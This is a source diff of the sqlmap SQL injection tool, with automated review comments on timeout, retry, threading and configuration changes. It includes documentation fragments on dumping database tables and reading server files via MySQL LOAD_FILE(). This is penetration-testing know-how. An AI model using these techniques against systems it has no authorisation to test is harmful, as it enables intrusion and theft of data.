</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Fingerprint
<sect2>Extensive database management system fingerprint
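Review bot: the `Test for Time Based blind SQL injection` section is still `TODO` after the move under Techniques; since `--time-test` is advertised in the help and `goStacked` decides the test on `duration >= SECONDS` (5 seconds in settings), a short paragraph explaining that sqlmap sends a delaying payload and compares the response time against that threshold would close the gap, and it should mention that a slow target or a small `--timeout` can distort the result.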
@ -2183,7 +2230,7 @@ databases tables, only the users' schema that the web application's user
is connected to, which is always <tt>public</tt>.
<sect2>Dump database tables entries
<sect2>Dump database table entries
<p>
Options: <tt>--dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
@ -2281,8 +2328,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</verb></tscreen>
<p>
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt> option
to limit the dump to a range of entries.
You can also provide the <tt>--start</tt> and/or the <tt>--stop</tt>
options to limit the dump to a range of entries.
<itemize>
<item><tt>--start</tt> specifies the first entry to enumerate
@ -2789,8 +2836,8 @@ Option: <tt>--read-file</tt>
<p>
If the back-end database management system is MySQL and the current user
has access to the <tt>LOAD_FILE()</tt> function, it is possible to read
the content of a specific file from the file system.
has <tt>FILE</tt> access (access to <tt>LOAD_FILE()</tt> builtin function),
it is possible to read the content of a specific file from the file system.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
@ -3112,27 +3159,6 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</verb></tscreen>
<sect2>Load options from a configuration INI file
<p>
Option: <tt>-c</tt>
<p>
It is possible to pass user's option from a configuration INI file, an
example is <tt>sqlmap.conf</tt>.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</verb></tscreen>
<sect2>Save options on a configuration INI file
<p>

View File

@ -114,6 +114,7 @@ M Simkin <mlsimkin@cox.net>
Jason Swan <jasoneswan@gmail.com>
for reporting a bug when enumerating columns on Microsoft SQL Server
for suggesting a couple of improvements
Alessandro Tanasi <alessandro@tanasi.it>
for extensively beta-testing sqlmap

View File

@ -74,6 +74,10 @@ class sqlmapNotVulnerableException(Exception):
pass
class sqlmapThreadException(Exception):
pass
class sqlmapUnsupportedDBMSException(Exception):
pass
@ -108,6 +112,7 @@ exceptionsTuple = (
sqlmapUndefinedMethod,
sqlmapMissingPrivileges,
sqlmapNotVulnerableException,
sqlmapThreadException,
sqlmapUnsupportedDBMSException,
sqlmapUnsupportedFeatureException,
sqlmapValueException,

View File

@ -28,6 +28,7 @@ import cookielib
import logging
import os
import re
import socket
import time
import urllib2
import urlparse
@ -264,7 +265,7 @@ def __setRemoteDBMS():
def __setThreads():
if conf.threads <= 0:
if not isinstance(conf.threads, int) or conf.threads <= 0:
conf.threads = 1
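Review bot: `if not isinstance(conf.threads, int) or conf.threads <= 0:` silently replaces an invalid `--threads` value with 1, whereas `__setHTTPTimeout` in the same file logs a warning when it resets a bad value; log the same kind of warning here so the user learns the value was ignored. Note also that in Python 2 a `bool` passes the `isinstance(..., int)` check, so `True` would be accepted as one thread.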
@ -488,6 +489,29 @@ def __setHTTPCookies():
conf.httpHeaders.append(("Cookie", conf.cookie))
def __setHTTPTimeout():
"""
Set the HTTP timeout
"""
if conf.timeout:
debugMsg = "setting the HTTP timeout"
logger.debug(debugMsg)
conf.timeout = float(conf.timeout)
if conf.timeout < 3.0:
warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap "
warnMsg += "will going to reset it"
logger.warn(warnMsg)
conf.timeout = 3.0
else:
conf.timeout = 10.0
socket.setdefaulttimeout(conf.timeout)
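Review bot: `conf.timeout = float(conf.timeout)` is unguarded, so a non-numeric value coming from the configuration file (where the INI parser, not optparse with `type="float"`, supplies it) raises an uncaught `ValueError` instead of a sqlmap exception; wrap it and raise `sqlmapValueException` with a clear message. Related: `optDict` declares `"timeout": "int"` while the command-line option is `type="float"` and the README says 10.5 is valid, so a fractional timeout in `sqlmap.conf` is truncated or rejected; make it `"float"` as `delay` is. Two smaller points: the warning text `will going to reset it` should read `is going to reset it`, and the default of 10 lives only in the help string and in this `else:` branch (the option has no `default=`), so keep both in one settings constant. Finally, the minimum is 3.0 while `SECONDS`, the time-based blind threshold, is 5: a user choosing `--timeout 3` or `4` makes every `--time-test` request time out before the delay is observed, so either document that or enforce `timeout > SECONDS` when `--time-test` is set.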
def __cleanupOptions():
"""
Cleanup configuration attributes.
@ -543,9 +567,11 @@ def __setConfAttributes():
conf.paramNegative = False
conf.path = None
conf.port = None
conf.retries = 0
conf.scheme = None
conf.sessionFP = None
conf.start = True
conf.threadException = False
def __setKnowledgeBaseAttributes():
@ -682,6 +708,7 @@ def init(inputOptions=advancedDict()):
__setConfAttributes()
__setKnowledgeBaseAttributes()
__cleanupOptions()
__setHTTPTimeout()
__setHTTPCookies()
__setHTTPReferer()
__setHTTPUserAgent()

View File

@ -25,12 +25,14 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
optDict = {
# Family: { "parameter_name": "parameter_datatype",
"Request": {
# Family: { "parameter_name": "parameter_datatype" },
"Target": {
"url": "string",
"list": "string",
"googleDork": "string",
"testParameter": "string",
},
"Request": {
"method": "string",
"data": "string",
"cookie": "string",
@ -42,18 +44,20 @@ optDict = {
"proxy": "string",
"threads": "integer",
"delay": "float",
"timeout": "int",
},
"Injection": {
"testParameter": "string",
"string": "string",
"dbms": "string",
},
"Techniques": {
"Techniques": {
"timeTest": "boolean",
"unionTest": "boolean",
"unionUse": "boolean",
},
},
"Fingerprint": {
"extensiveFp": "boolean",

View File

@ -30,7 +30,7 @@ import sys
# sqlmap version and site
VERSION = "0.6.3-rc3"
VERSION = "0.6.3-rc4"
VERSION_STRING = "sqlmap/%s" % VERSION
SITE = "http://sqlmap.sourceforge.net"
@ -65,4 +65,6 @@ ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ]
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
TIME_DELAY = 5
# TODO: port to command line/configuration file options?
SECONDS = 5
RETRIES = 3
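Review bot: renaming `TIME_DELAY` to `SECONDS` makes the constant less descriptive; at the use site `duration >= SECONDS` no longer says what the 5 seconds are for. A name such as `TIME_TEST_SECONDS` keeps the meaning, and since those 5 seconds must stay below the HTTP timeout for `--time-test` to work, a comment to that effect next to the definition would help. The TODO above it already asks whether to expose the value as an option; with `--timeout` now being added, this is the natural moment to do so.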

View File

@ -41,21 +41,25 @@ def cmdLineParser():
parser = OptionParser(usage=usage, version=VERSION_STRING)
try:
# Target options
target = OptionGroup(parser, "Target", "At least one of these "
"options has to be specified to set the source "
"to get target urls from.")
target.add_option("-u", "--url", dest="url", help="Target url")
target.add_option("-l", dest="list", help="Parse targets from Burp "
"or WebScarab logs")
target.add_option("-g", dest="googleDork",
help="Process Google dork results as target urls")
target.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
# Request options
request = OptionGroup(parser, "Request", "These options have to "
"be specified to set the target url, HTTP "
"method, how to connect to the target url "
"or Google dorking results in general.")
request.add_option("-u", "--url", dest="url", help="Target url")
request.add_option("-l", dest="list", help="List of targets")
request.add_option("-g", dest="googleDork",
help="Process Google dork results as target urls")
request.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
request = OptionGroup(parser, "Request", "These options can be used "
"to specify how to connect to the target url.")
request.add_option("--method", dest="method", default="GET",
help="HTTP method, GET or POST (default: GET)")
@ -94,10 +98,17 @@ def cmdLineParser():
request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection "
"(default 10)")
# Injection options
injection = OptionGroup(parser, "Injection")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
injection.add_option("--string", dest="string",
help="String to match in page when the "
"query is valid")
@ -253,15 +264,13 @@ def cmdLineParser():
help="Save and resume all data retrieved "
"on a session file")
miscellaneous.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
help="Save options on a configuration INI file")
miscellaneous.add_option("--batch", dest="batch", action="store_true",
help="Never ask for user input, use the default behaviour")
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(injection)
parser.add_option_group(techniques)

View File

@ -79,12 +79,16 @@ def configFileParser(configFile):
config = ConfigParser()
config.read(configFile)
if not config.has_section("Request"):
raise NoSectionError, "Request in the configuration file is mandatory"
if not config.has_section("Target"):
raise NoSectionError, "Target in the configuration file is mandatory"
if not config.has_option("Request", "url") and not config.has_option("Request", "googleDork"):
condition = not config.has_option("Target", "url")
condition &= not config.has_option("Target", "list")
condition &= not config.has_option("Target", "googleDork")
if condition:
errMsg = "missing a mandatory option in the configuration "
errMsg += "file (url or googleDork)"
errMsg += "file (url, list or googleDork)"
raise sqlmapMissingMandatoryOptionException, errMsg
for family, optionData in optDict.items():
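Review bot: a configuration file written for the previous release, with `url` under `[Request]`, now fails with `NoSectionError` because `[Target]` is mandatory and `url`, `list` and `googleDork` are only looked up there; this is a breaking change for existing `sqlmap.conf` files and should be called out in the ChangeLog and README. Also `raise NoSectionError, "Target in the configuration file is mandatory"` passes the message as the section name, so ConfigParser renders it as `No section: 'Target in the configuration file is mandatory'`; raise `sqlmapMissingMandatoryOptionException` with the message instead, as the option check just below already does.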

View File

@ -31,6 +31,7 @@ import socket
import time
import urllib2
import urlparse
import traceback
from lib.contrib import multipartpost
from lib.core.convert import urlencode
@ -38,6 +39,7 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException
from lib.core.settings import RETRIES
from lib.request.basic import forgeHeaders
from lib.request.basic import parseResponse
@ -48,6 +50,12 @@ class Connect:
This class defines methods used to perform HTTP requests
"""
@staticmethod
def __getPageProxy(**kwargs):
return Connect.getPage(**kwargs)
@staticmethod
def getPage(**kwargs):
"""
@ -55,6 +63,9 @@ class Connect:
the target url page content
"""
if conf.delay != None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
url = kwargs.get('url', conf.url).replace(" ", "%20")
get = kwargs.get('get', None)
post = kwargs.get('post', None)
@ -63,6 +74,7 @@ class Connect:
direct = kwargs.get('direct', False)
multipart = kwargs.get('multipart', False)
page = ""
cookieStr = ""
requestMsg = "HTTP request:\n%s " % conf.method
responseMsg = "HTTP response "
@ -115,6 +127,9 @@ class Connect:
req = urllib2.Request(url, post, headers)
conn = urllib2.urlopen(req)
# Reset the number of connection retries
conf.retries = 0
if not req.has_header("Accept-Encoding"):
requestHeaders += "\nAccept-Encoding: identity"
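Review bot: `conf.retries = 0` is reset on every successful `urlopen`, but `conf.retries` is a single counter shared by all threads when `--threads` is above 1: one thread's success resets the count accumulated by another thread's failures, and two failing threads increment it together, so the effective retry limit per request is neither 3 nor predictable. Make the counter local to `getPage` (pass it through the retry call as a kwarg) instead of keeping it in `conf`.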
@ -161,40 +176,37 @@ class Connect:
status = e.msg
responseHeaders = e.info()
except (urllib2.URLError, socket.error), _:
warnMsg = "unable to connect to the target url"
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), _:
tbMsg = traceback.format_exc()
if "URLError" in tbMsg or "error" in tbMsg:
warnMsg = "unable to connect to the target url"
elif "timeout" in tbMsg:
warnMsg = "connection timed out to the target url"
elif "BadStatusLine" in tbMsg:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.multipleTargets:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
else:
if "BadStatusLine" not in tbMsg:
warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg
except socket.timeout, _:
warnMsg = "connection timed out to the target url"
if conf.retries < RETRIES:
conf.retries += 1
if conf.multipleTargets:
warnMsg += ", skipping to next url"
warnMsg += ", sqlmap is going to retry the request"
logger.warn(warnMsg)
return None
else:
warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg
except httplib.BadStatusLine, _:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.multipleTargets:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
time.sleep(1)
return Connect.__getPageProxy(get=get, post=post, cookie=cookie, ua=ua, direct=direct, multipart=multipart)
else:
raise sqlmapConnectionException, warnMsg
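Review bot: the retry call `Connect.__getPageProxy(get=get, post=post, cookie=cookie, ua=ua, direct=direct, multipart=multipart)` does not forward `url`, so a request made with an explicit `url` kwarg (anything other than `conf.url`, see `url = kwargs.get('url', conf.url)` above) is retried against the default target url; pass `url=url` through, and since `__getPageProxy` is a one-line pass-through to `Connect.getPage`, the retry can call `getPage` directly or the wrapper should carry a comment explaining why it exists. The classification by searching `traceback.format_exc()` is also fragile: `"error" in tbMsg` matches any traceback whose frames or message contain that word (for example the `raise URLError(err)` source line from urllib2), so the `timeout` and `BadStatusLine` branches are reached only by accident, and if no branch matches `warnMsg` is unbound and the following `logger.warn(warnMsg)` raises `NameError`. Bind the exception (`except (...), e:`) and branch on `isinstance(e, socket.timeout)` and `isinstance(e, httplib.BadStatusLine)` first (`socket.timeout` is a subclass of `socket.error`), falling back to the generic connection message.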
@ -208,9 +220,6 @@ class Connect:
logger.log(8, responseMsg)
if conf.delay != None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
return page

View File

@ -38,7 +38,7 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.data import temp
from lib.core.settings import TIME_DELAY
from lib.core.settings import SECONDS
from lib.request.connect import Connect as Request
from lib.techniques.inband.union.use import unionUse
from lib.techniques.blind.inference import bisection
@ -394,6 +394,6 @@ def goStacked(expression, timeTest=False):
duration = int(time.time() - start)
if timeTest:
return (duration >= TIME_DELAY, payload)
return (duration >= SECONDS, payload)
else:
return duration >= TIME_DELAY
return duration >= SECONDS
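Review bot: renaming the settings constant from TIME_DELAY to SECONDS drops the meaning the old name carried; SECONDS says nothing about what the seconds are for, and this commit introduces a connection timeout that is also a number of seconds. A name that keeps the purpose, such as TIME_DELAY_SECONDS or TIME_BLIND_DELAY, would make both goStacked and timeTest read unambiguously.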


@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import threading
import time
import traceback
from lib.core.agent import agent
from lib.core.common import dataToSessionFile
@ -34,7 +35,10 @@ from lib.core.common import replaceNewlineTabs
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException
from lib.core.exception import sqlmapValueException
from lib.core.exception import sqlmapThreadException
from lib.core.exception import unhandledException
from lib.core.progress import ProgressBar
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
@ -46,6 +50,9 @@ def bisection(payload, expression, length=None):
on an affected host
"""
partialValue = ""
finalValue = ""
if kb.dbmsDetected:
_, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
@ -102,6 +109,7 @@ def bisection(payload, expression, length=None):
maxValue = limit
if (maxValue - minValue) == 1:
# NOTE: this first condition should never occur
if maxValue == 1:
return None
else:
@ -145,7 +153,7 @@ def bisection(payload, expression, length=None):
val = getChar(curidx)
if val == None:
raise sqlmapValueException, "Failed to get character at index %d (expected %d total)" % (curidx, length)
raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length)
value[curidx-1] = val
@ -157,9 +165,38 @@ def bisection(payload, expression, length=None):
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), s))
iolock.release()
def downloadThreadProxy(numThread):
try:
downloadThread()
except (sqlmapConnectionException, sqlmapValueException), errMsg:
conf.threadException = True
logger.error("thread %d: %s" % (numThread + 1, errMsg))
except KeyboardInterrupt:
conf.threadException = True
print
logger.debug("waiting for threads to finish")
try:
while (threading.activeCount() > 1):
pass
except KeyboardInterrupt:
raise sqlmapThreadException, "user aborted"
except:
conf.threadException = True
errMsg = unhandledException()
logger.error("thread %d: %s" % (numThread + 1, errMsg))
traceback.print_exc()
# Start the threads
for _ in range(numThreads):
thread = threading.Thread(target=downloadThread)
for numThread in range(numThreads):
thread = threading.Thread(target=downloadThreadProxy(numThread))
thread.start()
threads.append(thread)
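Review bot: `thread = threading.Thread(target=downloadThreadProxy(numThread))` calls downloadThreadProxy in the main thread at construction time and hands its return value (None) to Thread as the target, so each download runs synchronously inside the for loop and the threads that are then started do nothing; with threads > 1 the inference is effectively serialised. It should be `threading.Thread(target=downloadThreadProxy, args=(numThread,))`. Two points inside downloadThreadProxy: KeyboardInterrupt is delivered to the main thread only, so that handler will not fire in a real worker thread (it fires today only because of the bug above), and `while (threading.activeCount() > 1): pass` is a busy loop that pins a core while waiting; joining the other threads, or sleeping briefly in the loop, would be kinder.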
@ -167,19 +204,27 @@ def bisection(payload, expression, length=None):
for thread in threads:
thread.join()
assert None not in value
# If we have got one single character not correctly fetched it
# can mean that the connection to the target url was lost
if None in value:
for v in value:
if isinstance(v, str) and v != None:
partialValue += v
value = "".join(value)
if partialValue:
finalValue = partialValue
infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), finalValue)
else:
finalValue = "".join(value)
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), finalValue)
assert index[0] == length
if isinstance(finalValue, str) and len(finalValue) > 0:
dataToSessionFile(replaceNewlineTabs(finalValue))
dataToSessionFile(replaceNewlineTabs(value))
if conf.verbose in ( 1, 2 ) and not showEta:
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), value))
if conf.verbose in ( 1, 2 ) and not showEta and infoMsg:
dataToStdout(infoMsg)
else:
value = ""
index = 0
while True:
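Review bot: when a position in value is None, the loop at `for v in value:` concatenates only the characters that were fetched, so every character after a gap shifts left in partialValue and the "partially retrieved" output, as well as the string handed to dataToSessionFile, misrepresents which positions are actually known. Substitute a visible placeholder for each missing position (or record the missing indexes) instead of closing the gaps, and reconsider whether a partial result should reach the session file at all, since on resume it is indistinguishable from a correctly retrieved prefix. `isinstance(v, str) and v != None` is redundant: a str is never None.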
@ -190,7 +235,7 @@ def bisection(payload, expression, length=None):
if val == None:
break
value += val
finalValue += val
dataToSessionFile(replaceNewlineTabs(val))
@ -203,9 +248,13 @@ def bisection(payload, expression, length=None):
dataToStdout("\n")
if ( conf.verbose in ( 1, 2 ) and showEta and len(str(progress)) >= 64 ) or conf.verbose >= 3:
infoMsg = "retrieved: %s" % value
infoMsg = "retrieved: %s" % finalValue
logger.info(infoMsg)
dataToSessionFile("]\n")
if not partialValue:
dataToSessionFile("]\n")
return queriesCount[0], value
if conf.threadException:
raise sqlmapThreadException, "something unexpected happen into the threads"
return queriesCount[0], finalValue
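Review bot: the message "something unexpected happen into the threads" should read "something unexpected happened in the threads". Beyond wording, conf.threadException is set True in downloadThreadProxy but nothing in this patch clears it, so once one bisection call fails every later call will raise as well unless the flag is reset at the start of bisection. The `if not partialValue:` guard around `dataToSessionFile("]\n")` leaves the session entry unterminated when the value was only partially retrieved; if that is intended as a resume marker, say so in a comment, since an unterminated entry otherwise looks like a crash.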


@ -27,7 +27,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.settings import TIME_DELAY
from lib.core.settings import SECONDS
from lib.request import inject
@ -36,7 +36,7 @@ def timeTest():
infoMsg += "'%s'" % kb.injParameter
logger.info(infoMsg)
query = queries[kb.dbms].timedelay % TIME_DELAY
query = queries[kb.dbms].timedelay % SECONDS
timeTest = inject.goStacked(query, timeTest=True)
if timeTest[0] == True:


@ -1,10 +1,10 @@
[Request]
[Target]
# Target URL.
# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
# PHP and MySQL (local)
url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
#url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1
#url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1
# PHP and Oracle (local)
#url = http://127.0.0.1/sqlmap/oracle/get_int.php?id=1
# PHP and PostgreSQL (local)
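Review bot: the shipped default `url` in sqlmap.conf is switched from get_int.php to get_int_partialunion.php while the former is commented out; this reads like a local test setting that leaked into the commit rather than an intended change, and it is unrelated to the connection handling work in the rest of the patch. Keep the previous default, or leave url empty, so the sample configuration does not point at a page set up for a specific test.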
@ -21,7 +21,7 @@ url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
#url = http://192.168.192.10/sqlmap/get_int.aspx?id=1
#url =
# List of targets
# Parse targets from Burp or WebScarab logs
# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path
# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
# 'conversations/' folder path
@ -34,9 +34,8 @@ list =
# Example: +ext:php +inurl:"&id=" +intext:"powered by "
googleDork =
# Testable parameter(s) comma separated. By default all GET/POST/Cookie
# parameters and HTTP User-Agent are tested by sqlmap.
testParameter =
[Request]
# HTTP method to perform HTTP requests.
# Valid: GET or POST
@ -88,9 +87,18 @@ threads = 1
# Default: 0
delay = 0
# Seconds to wait before timeout connection.
# Valid: float
# Default: 10
timeout = 10
[Injection]
# Testable parameter(s) comma separated. By default all GET/POST/Cookie
# parameters and HTTP User-Agent are tested by sqlmap.
testParameter =
# String to match in page when the query is valid, only needed if the
# page content dynamically changes at each refresh, consequently changing
# the MD5 of the page which is the method used by default to determine
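Review bot: the comment on the new option should read "Seconds to wait before the connection times out." rather than "Seconds to wait before timeout connection." Also, moving testParameter from [Target] into the new [Injection] section is a silent change for anyone with an existing sqlmap.conf: an option left under the old section will simply be ignored if it is looked up by section name. Mention the move in the ChangeLog, or accept the key under both sections for one release.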
@ -101,7 +109,7 @@ string =
# Force back-end DBMS to this value. If this option is set, the back-end
# DBMS identification process will be minimized as needed.
# If not set, sqlmap will detect back-end DBMS automatically by default.
# Valid: mssql, mysql, oracle, pgsql
# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql
dbms =